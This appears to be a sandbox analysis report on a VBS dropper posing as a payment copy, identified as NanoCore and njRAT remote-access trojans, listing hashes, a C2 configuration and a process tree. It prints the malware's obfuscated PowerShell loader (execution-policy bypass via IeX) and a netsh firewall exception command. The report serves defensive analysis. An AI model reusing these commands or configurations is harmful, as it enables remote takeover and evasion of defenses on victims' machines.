Overview

overview

10

Static

static

J3m1a_Paym...py.vbs

windows7_x64

3

J3m1a_Paym...py.vbs

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    18-11-2021 19:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    J3m1a_Payment_Copy.vbs

  • Size

    2KB

  • MD5

    69cb30fd3d94cfcc7c89a1f41a47d8dd

  • SHA1

    5cc7c867d8b5238fa7ad4718c5ba5d105e72cd22

  • SHA256

    6cb5a93eec2726f651d8a61a9e865d46a93324992d9a2467edb6b83b64789985

  • SHA512

    02a96d4ecfda83233a557ac3cf94629ee251ed9ecef775bd697d371091c5c03fb48aacb4640770fdd9fd097f1cd118b62053c0f26183e08062ede68a6c4b8d5a

Score
10/10
nanocorenjrathackedevasionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

jamcav.duckdns.org:6746

Mutex

9bb8b571-1a08-4fb2-8447-a1da0968f2fa

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    jamcav.duckdns.org

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-08-20T15:54:30.577245636Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    6746

  • default_group

    jam

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    9bb8b571-1a08-4fb2-8447-a1da0968f2fa

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    jamcav.duckdns.org

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1752
          • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
            "C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"
            5⤵
            • Executes dropped EXE
            PID:316
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE
            5⤵
              PID:3984

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      114c93321b801971f69ed35cb9226f35

      SHA1

      69e07353153eacf0b9a820275b77cfb13b6178a1

      SHA256

      bc46b8ab4da03c0560566812bec2c237a8fd57b7004f92f50d7bd82b6bef1f51

      SHA512

      3ea774041f95edf6854aa1ca363c3b8453c3fb979340e3d5338c33773d79da0179bc0ac5d2d4bac251d06466ef1bc7695d8ef3167b8db58c0c8d6c1c5e1ca9a3

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
      MD5

      f1feead2143c07ca411d82a29fa964af

      SHA1

      2198e7bf402773757bb2a25311ffd2644e5a1645

      SHA256

      8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

      SHA512

      e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
      MD5

      f1feead2143c07ca411d82a29fa964af

      SHA1

      2198e7bf402773757bb2a25311ffd2644e5a1645

      SHA256

      8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

      SHA512

      e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

      Download Submit
    • C:\Users\Public\Downloads\HBar.ps1
      MD5

      337541d9757cb9a63d85337a2f1a4f27

      SHA1

      377ed9d80c26e3d0f3d6f943fa773a3ff83fe242

      SHA256

      867cca9a95ed015d4a227078782bf495af80c6101d0085eddcfe8aecc6284bef

      SHA512

      9e98ac416efd807434386942b6f3fb938a384479a0703e89324b769053eaf72ecd609cc826f172227ad93e7efd5e90caeb0ebca939bbec53981244013bb31031

      Download Submit
    • memory/316-202-0x000000007F460000-0x000000007F461000-memory.dmp
      Filesize

      4KB

      Download
    • memory/316-200-0x00000000006F0000-0x00000000006F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/316-192-0x0000000000000000-mapping.dmp
      Download
    • memory/1168-182-0x0000000005E00000-0x0000000005E03000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1168-172-0x0000000004F20000-0x0000000004F21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1168-163-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

      Download
    • memory/1168-181-0x0000000005170000-0x0000000005189000-memory.dmp
      Filesize

      100KB

      Download
    • memory/1168-180-0x0000000005160000-0x0000000005165000-memory.dmp
      Filesize

      20KB

      Download
    • memory/1168-164-0x000000000041E792-mapping.dmp
      Download
    • memory/1168-167-0x0000000005400000-0x0000000005401000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1168-194-0x0000000004F00000-0x00000000053FE000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/1168-170-0x0000000004F00000-0x00000000053FE000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/1168-169-0x0000000005040000-0x0000000005041000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1168-168-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1752-173-0x0000000000400000-0x0000000000418000-memory.dmp
      Filesize

      96KB

      Download
    • memory/1752-174-0x00000000004123BE-mapping.dmp
      Download
    • memory/1752-193-0x0000000004F60000-0x000000000545E000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/2428-136-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-146-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-150-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-151-0x000001F625846000-0x000001F625848000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-152-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-162-0x000001F625860000-0x000001F625864000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2428-144-0x000001F625843000-0x000001F625845000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-143-0x000001F625840000-0x000001F625842000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-141-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-140-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-138-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-137-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-135-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-191-0x000001F623A00000-0x000001F623A02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2428-134-0x0000000000000000-mapping.dmp
      Download
    • memory/2624-128-0x000001CEEEFD0000-0x000001CEEEFD1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2624-125-0x000001CEEED43000-0x000001CEEED45000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-133-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-119-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-201-0x000001CEEED46000-0x000001CEEED48000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-118-0x0000000000000000-mapping.dmp
      Download
    • memory/2624-127-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-126-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-124-0x000001CEEED40000-0x000001CEEED42000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-129-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-198-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-123-0x000001CEEECF0000-0x000001CEEECF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2624-122-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-121-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2624-120-0x000001CED4E10000-0x000001CED4E12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3908-185-0x000000000040BBCE-mapping.dmp
      Download
    • memory/3908-184-0x0000000000400000-0x0000000000410000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3908-204-0x00000000054C0000-0x00000000059BE000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/3984-203-0x0000000000000000-mapping.dmp
      Download